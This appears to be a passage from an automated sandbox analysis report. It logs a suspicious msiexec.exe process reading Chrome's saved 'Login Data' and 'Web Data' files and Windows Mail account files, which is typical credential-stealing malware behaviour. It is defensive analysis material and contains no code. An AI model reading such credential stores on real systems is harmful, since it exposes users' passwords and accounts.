C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data unknown 100 success or wait 1 41643E ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data unknown 2048 success or wait 1 41643E ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data unknown 2048 success or wait 1 41643E ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data unknown 2048 success or wait 1 41643E ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data unknown 2048 success or wait 1 41643E ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data unknown 16 success or wait 1 41643E ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data unknown 100 success or wait 1 41643E ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data unknown 2048 success or wait 1 41643E ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data unknown 16 success or wait 1 41643E ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data unknown 2048 success or wait 1 41643E ReadFile

Start time: 14:49:53

Start date: 07/05/2018

Path: C:\Windows\System32\msiexec.exe

Wow64 process (32bit): false

Commandline: '' /stext 'C:\Users\user~1\AppData\Local\Temp\_pE73F.tmp'

Imagebase: 0x6b0000

File size: 73216 bytes

MD5 hash: 4315D6ECAE85024A0567DF2CB253B7B0

Has administrator privileges: true

Programmed in: C, C++ or other language

File Read

Analysis Process: msiexec.exe PID: 2224 Parent PID: 2032

General


Disassembly

Code Analysis

File Activities

Reputation: low

File Path Offset Length Completion Count Source Address Symbol

C:\Users\user\AppData\Local\Microsoft\Windows Mail\account{3824098E-E3FA-4A81-AF84-35154F5FAB29}.oeaccount

unknown 670 success or wait 1 406742 ReadFile

C:\Users\user\AppData\Local\Microsoft\Windows Mail\account{3C5A8A00-EFD1-4AB0-AC7C-70794DEA2474}.oeaccount

unknown 1734 success or wait 1 406742 ReadFile

C:\Users\user\AppData\Local\Microsoft\Windows Mail\account{E46164F7-F891-4841-A23E-F0A91618C5A6}.oeaccount

unknown 1506 success or wait 1 406742 ReadFile

Start time: 14:49:53

Start date: 07/05/2018

Path: C:\Windows\explorer.exe

Wow64 process (32bit): false

Commandline: C:\Windows\Explorer.EXE

Imagebase: 0x30000

File size: 2972672 bytes

MD5 hash: 6DDCA324434FFA506CF7DC4E51DB7935

Has administrator privileges: true

Programmed in: C, C++ or other language

Reputation: low

File Read

Analysis Process: explorer.exe PID: 1376 Parent PID: 2032

General
